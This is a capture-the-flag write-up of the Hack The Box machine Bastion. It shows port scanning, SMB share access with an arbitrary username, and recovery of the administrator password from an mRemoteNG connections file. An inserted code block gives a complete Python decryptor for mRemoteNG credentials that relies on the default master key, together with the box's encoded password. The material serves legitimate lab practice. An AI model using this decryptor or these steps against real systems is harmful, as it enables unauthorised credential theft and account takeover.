
Hack The Box Writeup - Bastion

Bastion is an easy Windows box. By exploiting weak user authentication for SMB, we were able to enumerate the SMB shares. There we discovered an interesting share that contained VHD backup files. Mounting those VHD files gave us access to the SYSTEM and SAM files, which were then used to dump the user password. Once we had access to the system, we enumerated it and found an mRemoteNG directory. This directory contained a config file in which the administrator’s encoded password was stored. Decoding it with the mRemoteNG encoding/decoding mechanism gave us the administrator password.

Enumeration

As always, we start by scanning the target machine’s open ports:

rustscan --ulimit 5000 bastion.htb -- -sV -sC -oN nmap_scan

PORT      STATE SERVICE      REASON  VERSION
22/tcp    open  ssh          syn-ack OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
|   256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack Microsoft Windows RPC
49668/tcp open  msrpc        syn-ack Microsoft Windows RPC
49669/tcp open  msrpc        syn-ack Microsoft Windows RPC
49670/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

The nmap output shows many open ports. The most interesting for us are SSH (22), RPC (135) and SMB (139/445).

Enumeration of SMB shares (port 139, 445)

When we first try to enumerate the SMB shares with smbmap, we get an authentication error. However, one of the most frequent SMB misconfigurations concerns exactly this: if we simply provide any arbitrary username, we are suddenly able to access the shares, because the server only rejects the request when no username is specified at all.

Looking at the shares, we see one share called Backups which is readable for us. Let’s investigate that further.

smbmap output using an arbitrary username: discovery of a share called “Backups”.

After mounting the share (alternatively, smbclient can be used to access it), we can look at its files and directories.

Mounting the remote share on our attacker machine

First, we look at the most obvious and eye-catching file, namely the note.txt:

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

Hmmm, backups. Maybe we should look through the WindowsImageBackup directory. After browsing these directories for a while, we find one that contains two VHD files.

“A VHD file contains a virtual hard disk image used by Microsoft Windows Virtual PC, a Windows virtualization program. It stores the contents of a hard disk of a virtual machine (VM), which may include disk partitions, a file system, files, and folders.” (https://fileinfo.com/extension/vhd)

sudo apt-get install libguestfs-tools

Initial Foothold - Enumerating the VHD files

Privilege Escalation

mRemoteNG (mremote) is an open source project (https://github.com/rmcardle/mRemoteNG) that provides a full-featured, multi-tab remote connections manager. It currently supports RDP, SSH, Telnet, VNC, ICA, HTTP/S, rlogin and raw socket connections. It also lets the user save connection settings such as hostnames, IP addresses, protocol, port and user credentials in a password-protected, encrypted connections file. The password can be found at %appdata%/mRemoteNG in a file named confCons.xml, and it is sometimes the administrator password (see https://vk9-sec.com/exploiting-mremoteng/).

What looks like a base64-encoded password turns out not to be one: base64-decoding it yields only garbage.

echo "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" | base64 -d

VaQt.ޙY`5Z(#ޠ-

The value is encrypted rather than merely encoded, and can be decrypted with the mRemoteNG-Decrypt script: https://github.com/haseebT/mRemoteNG-Decrypt/blob/master/mremoteng_decrypt.py
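As an added example (my own code, not the page's and not the mRemoteNG project's), here is the decoding that the linked script performs, with an encrypt counterpart so the format can be checked end to end: the base64 value is salt, nonce, AES-256-GCM ciphertext and tag, keyed by PBKDF2 of the master password, which is the built-in default mR3m when the user never set one. It assumes the `cryptography` package (or pycryptodome as a fallback) is installed; the function names are mine.

```python
import base64
import hashlib
import os

try:  # use the 'cryptography' package if present, otherwise fall back to pycryptodome
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    def _gcm_encrypt(key, nonce, plaintext, aad):
        return AESGCM(key).encrypt(nonce, plaintext, aad)  # returns ciphertext || tag

    def _gcm_decrypt(key, nonce, ct_and_tag, aad):
        return AESGCM(key).decrypt(nonce, ct_and_tag, aad)  # raises on a wrong key or tag
except ImportError:
    from Crypto.Cipher import AES

    def _gcm_encrypt(key, nonce, plaintext, aad):
        cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
        cipher.update(aad)
        ciphertext, tag = cipher.encrypt_and_digest(plaintext)
        return ciphertext + tag

    def _gcm_decrypt(key, nonce, ct_and_tag, aad):
        cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
        cipher.update(aad)
        return cipher.decrypt_and_verify(ct_and_tag[:-16], ct_and_tag[-16:])

DEFAULT_MASTER_PASSWORD = "mR3m"  # mRemoteNG's built-in default when no custom one is set
# The encoded Administrator value quoted from confCons.xml on this page.
BASTION_BLOB = "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

def _derive_key(master_password, salt):
    # PBKDF2-HMAC-SHA1, 1000 iterations, 32-byte AES key, as mRemoteNG derives it
    return hashlib.pbkdf2_hmac("sha1", master_password.encode(), salt, 1000, dklen=32)

def decrypt_mremoteng(blob_b64, master_password=DEFAULT_MASTER_PASSWORD):
    """Payload layout: salt(16) | nonce(16) | ciphertext | GCM tag(16).
    The salt doubles as associated data, so it is authenticated but not encrypted."""
    data = base64.b64decode(blob_b64)
    salt, nonce, body = data[:16], data[16:32], data[32:]
    return _gcm_decrypt(_derive_key(master_password, salt), nonce, body, salt).decode()

def encrypt_mremoteng(plaintext, master_password=DEFAULT_MASTER_PASSWORD):
    """Inverse of decrypt_mremoteng; useful for building test fixtures."""
    salt, nonce = os.urandom(16), os.urandom(16)
    body = _gcm_encrypt(_derive_key(master_password, salt), nonce, plaintext.encode(), salt)
    return base64.b64encode(salt + nonce + body).decode()

if __name__ == "__main__":
    print(decrypt_mremoteng(BASTION_BLOB))
```

The only secret in this scheme is the master password, so a connections file protected by the default mR3m is readable by anyone who can open confCons.xml; setting a custom master password in mRemoteNG is what makes the stored credentials actually protected.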

This post is licensed under CC BY 4.0 by the author.